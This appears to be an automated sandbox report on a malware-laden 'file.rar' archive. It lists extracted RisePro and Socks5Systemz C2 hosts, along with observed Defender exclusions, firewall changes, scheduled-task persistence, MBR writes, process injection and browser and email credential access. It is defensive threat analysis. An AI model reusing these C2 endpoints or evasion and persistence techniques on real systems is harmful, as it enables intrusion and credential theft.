Analysis
max time kernel: 441s
max time network: 448s
platform: windows7_x64
resource: win7-20240611-en
resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
submitted: 15-06-2024 20:50
Static task
static1
Behavioral task
behavioral1
Sample
file.rar
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
amdhip64.dll
Resource
win7-20240611-en
Behavioral task
behavioral3
Sample
concrt140.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
msvcp140.dll
Resource
win7-20240221-en
Behavioral task
behavioral5
Sample
res_mods/1.23.0.0/scripts/client/gui/mods/mod_a.pyc
Resource
win7-20240611-en
Behavioral task
behavioral6
Sample
setup.exe
Resource
win7-20240508-en
General
Target: file.rar
Size: 8.8MB
MD5: 3443deb58509fdef6b491faecb2af7c3
SHA1: 06a8d45a279f1b5bccb37f20f1d0551860aa1849
SHA256: 0e1dc7a84177af8d5ce9df7049e6fbd7ee7c4acf65e4e882383baa343700a85b
SHA512: d5a43c37257c045b69c4316cced0a50b32386560851710c82549b3e5b342db090168d4563a5272814e5a1399486b74f4bc3fc2723ec553577cb34fdf3bd981fa
SSDEEP: 196608:ulofIzfDC8WqVrQT4tzXXg83wb0MCKFu46X9PckOeIXhGQN:u3TN3A83gKK84OHOeEN
Malware Config
Extracted
risepro
147.45.47.126:58709
Extracted
socks5systemz
csgsnhz.net
http://csgsnhz.net/search/?q=67e28dd86f5ff42d4509ac187c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f771ea771795af8e05c645db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a6f8af714c0ee92
http://csgsnhz.net/search/?q=67e28dd86f5ff42d4509ac187c27d78406abdd88be4b12eab517aa5c96bd86ec928644825a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b616e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff810c8eb9d9f3bcc68
Signatures

Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | setup.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
Socks5Systemz
Socks5Systemz is a botnet written in C++.
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vZXYUjRGERiGC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jgefCrdckMUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jbywMxbyABuU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TGSqLNfOU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jbywMxbyABuU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vZXYUjRGERiGC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\tvOexZGeSXRtrQVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TGSqLNfOU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jgefCrdckMUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\tvOexZGeSXRtrQVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jLjeNaiUMFXhhNbk = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\SysWOW64\vmffvbwj = "0" | svchost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ = "0" | reg.exe
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
215 | 2684 | rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
Processes:
pid | process
1564 | powershell.exe
2964 | powershell.exe
2712 | powershell.exe
1524 | powershell.exe
1660 | powershell.exe
2532 | powershell.exe
2616 | powershell.exe
3032 | powershell.exe
2548 | powershell.EXE
2112 | powershell.exe
2176 | powershell.exe
2176 | powershell.exe
Creates new service(s) 2 TTPs

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
pid | process
3060 | netsh.exe
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\vmffvbwj\ImagePath = "C:\\Windows\\SysWOW64\\vmffvbwj\\hkdooxyy.exe" | svchost.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation | setup.exe
Key value queried | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation | fw6AeST27Bm2vlk0DxSBSQX2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation | aj2A10.exe
Key value queried | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation | Pwhrnod.exe
Key value queried | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Control Panel\International\Geo\Nation | hVUcgSG.exe
Executes dropped EXE 25 IoCs
Processes:
pid | process
2808 | setup.exe
956 | setup.exe
3052 | HZCRf2RVpwaPOKWoRBM82pMK.exe
2272 | jNFCat12JprTAJuHReQN2XR8.exe
2176 | 2Bieq5wNDNkAsJ0rFBlk_AlN.exe
2168 | Pus3tCSrefwVPztCKhp87ihX.exe
1716 | f2hEJNjebYbdDHdjR8ZZyQ9Q.exe
2976 | QsEZf7p3mqmJQ7IoFER23P5U.exe
676 | fw6AeST27Bm2vlk0DxSBSQX2.exe
848 | DH8573Md6ciWRCrzNsLgNn0N.exe
1036 | DH8573Md6ciWRCrzNsLgNn0N.tmp
2868 | Install.exe
592 | Install.exe
1960 | aj2A10.exe
1548 | svomediaplayer32.exe
460 |
1464 | bkqtzupkspiy.exe
2364 | svomediaplayer32.exe
1532 | hkdooxyy.exe
640 | alRnUJb.exe
2688 | DBKKFHIEGD.exe
700 | BFHJECAAAF.exe
1548 | Pwhrnod.exe
2784 | alRnUJb.exe
1272 | hVUcgSG.exe
Loads dropped DLL 64 IoCs
Processes:
taskmgr.exesetup.exeHZCRf2RVpwaPOKWoRBM82pMK.exeDH8573Md6ciWRCrzNsLgNn0N.exeDH8573Md6ciWRCrzNsLgNn0N.tmpfw6AeST27Bm2vlk0DxSBSQX2.exeInstall.exeInstall.exeaj2A10.exeMSBuild.exeWerFault.exepid process 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1188 1736 taskmgr.exe 1736 taskmgr.exe 1188 1736 taskmgr.exe 1736 taskmgr.exe 2808 setup.exe 2808 setup.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 1736 taskmgr.exe 1736 taskmgr.exe 848 DH8573Md6ciWRCrzNsLgNn0N.exe 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 2868 Install.exe 2868 Install.exe 2868 Install.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 2868 Install.exe 592 Install.exe 592 Install.exe 592 Install.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1960 aj2A10.exe 1036 DH8573Md6ciWRCrzNsLgNn0N.tmp 460 1736 taskmgr.exe 1736 taskmgr.exe 1088 MSBuild.exe 1088 MSBuild.exe 1088 MSBuild.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1088 MSBuild.exe 1088 MSBuild.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description | ioc
Destination IP | 141.98.234.31
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jNFCat12JprTAJuHReQN2XR8.exe
Key opened | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jNFCat12JprTAJuHReQN2XR8.exe
Key opened | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jNFCat12JprTAJuHReQN2XR8.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | jNFCat12JprTAJuHReQN2XR8.exe
Checks for any installed AV software in registry 1 TTPs 4 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast | fw6AeST27Bm2vlk0DxSBSQX2.exe
Key opened | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\AVAST Software\Avast | fw6AeST27Bm2vlk0DxSBSQX2.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast | aj2A10.exe
Key opened | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\AVAST Software\Avast | aj2A10.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension 3 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | Pwhrnod.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | Pwhrnod.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | hVUcgSG.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
5 | api.myip.com
6 | api.myip.com
11 | ipinfo.io
12 | ipinfo.io
92 | ipinfo.io
94 | ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
description | ioc | process
File opened for modification | \??\PHYSICALDRIVE0 | f2hEJNjebYbdDHdjR8ZZyQ9Q.exe
File opened for modification | \??\PhysicalDrive0 | aj2A10.exe
Drops file in System32 directory 35 IoCs
Processes:
setup.exepowershell.exepowershell.exepowershell.exehVUcgSG.exepowershell.exesvchost.exealRnUJb.exepowershell.exePwhrnod.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat hVUcgSG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol alRnUJb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA Pwhrnod.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for 
modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 Pwhrnod.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E Pwhrnod.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 Pwhrnod.exe File opened for modification 
C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA Pwhrnod.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Pwhrnod.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hVUcgSG.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini alRnUJb.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA Pwhrnod.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 Pwhrnod.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
pid | process
2272 | jNFCat12JprTAJuHReQN2XR8.exe
2272 | jNFCat12JprTAJuHReQN2XR8.exe
2272 | jNFCat12JprTAJuHReQN2XR8.exe
2272 | jNFCat12JprTAJuHReQN2XR8.exe
2272 | jNFCat12JprTAJuHReQN2XR8.exe
Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 1464 set thread context of 1104 | 1464 | bkqtzupkspiy.exe | conhost.exe
PID 1464 set thread context of 3020 | 1464 | bkqtzupkspiy.exe | svchost.exe
PID 2976 set thread context of 1088 | 2976 | QsEZf7p3mqmJQ7IoFER23P5U.exe | MSBuild.exe
PID 1532 set thread context of 2924 | 1532 | hkdooxyy.exe | svchost.exe
Drops file in Program Files directory 24 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | Pwhrnod.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | Pwhrnod.exe
File created | C:\Program Files (x86)\TGSqLNfOU\mLutPpa.xml | Pwhrnod.exe
File created | C:\Program Files (x86)\TGSqLNfOU\fojvEjJ.xml | hVUcgSG.exe
File created | C:\Program Files (x86)\vZXYUjRGERiGC\LqbEsou.xml | Pwhrnod.exe
File created | C:\Program Files (x86)\jgefCrdckMUn\BDCiTWp.dll | Pwhrnod.exe
File created | C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\FMnGMxT.dll | hVUcgSG.exe
File created | C:\Program Files (x86)\vZXYUjRGERiGC\uxeimXa.xml | hVUcgSG.exe
File created | C:\Program Files (x86)\TGSqLNfOU\NDYUDM.dll | Pwhrnod.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | Pwhrnod.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | Pwhrnod.exe
File created | C:\Program Files (x86)\jbywMxbyABuU2\yldDABG.xml | Pwhrnod.exe
File created | C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\oOEgyeT.xml | Pwhrnod.exe
File created | C:\Program Files (x86)\vZXYUjRGERiGC\fZSTmyp.dll | Pwhrnod.exe
File created | C:\Program Files (x86)\jbywMxbyABuU2\ULzMSFLzdmVBB.dll | hVUcgSG.exe
File created | C:\Program Files (x86)\vZXYUjRGERiGC\uPRYhJX.dll | hVUcgSG.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | hVUcgSG.exe
File created | C:\Program Files (x86)\jbywMxbyABuU2\eYEkLFX.xml | hVUcgSG.exe
File created | C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\cSuranC.xml | hVUcgSG.exe
File created | C:\Program Files (x86)\TGSqLNfOU\LMFzmB.dll | hVUcgSG.exe
File created | C:\Program Files (x86)\jbywMxbyABuU2\ENSDNYJUUDyMN.dll | Pwhrnod.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | hVUcgSG.exe
File created | C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\WxLWWEL.dll | Pwhrnod.exe
File created | C:\Program Files (x86)\jgefCrdckMUn\CZncWNZ.dll | hVUcgSG.exe
Drops file in Windows directory 6 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\WEqRGXvoovdTvsnPk.job | schtasks.exe
File created | C:\Windows\Tasks\bKPbLIPtdWjYWtgKbM.job | schtasks.exe
File created | C:\Windows\Tasks\LyeaCXeAXIXykqmfO.job | schtasks.exe
File created | C:\Windows\Tasks\rkutRMUCKyfxaPV.job | schtasks.exe
File opened for modification | C:\Windows\Tasks\LyeaCXeAXIXykqmfO.job | schtasks.exe
File opened for modification | C:\Windows\Tasks\rkutRMUCKyfxaPV.job | schtasks.exe
Launches sc.exe 7 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
2408 | sc.exe
2052 | sc.exe
2092 | sc.exe
612 | sc.exe
2480 | sc.exe
1768 | sc.exe
1568 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 7 IoCs
Processes:
pid | pid_target | process | target process
1956 | 2688 | WerFault.exe | DBKKFHIEGD.exe
2504 | 700 | WerFault.exe | BFHJECAAAF.exe
836 | 640 | WerFault.exe | alRnUJb.exe
3008 | 2784 | WerFault.exe | alRnUJb.exe
2500 | 592 | WerFault.exe | Install.exe
1184 | 1548 | WerFault.exe | Pwhrnod.exe
2164 | 1272 | WerFault.exe | hVUcgSG.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | jNFCat12JprTAJuHReQN2XR8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | jNFCat12JprTAJuHReQN2XR8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | MSBuild.exe
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
328 | schtasks.exe
820 | schtasks.exe
2892 | schtasks.exe
3016 | schtasks.exe
2252 | schtasks.exe
2532 | schtasks.exe
2596 | schtasks.exe
2424 | schtasks.exe
2616 | schtasks.exe
652 | schtasks.exe
2152 | schtasks.exe
668 | schtasks.exe
1140 | schtasks.exe
2332 | schtasks.exe
264 | schtasks.exe
2084 | schtasks.exe
960 | schtasks.exe
2152 | schtasks.exe
2648 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
2300 | timeout.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
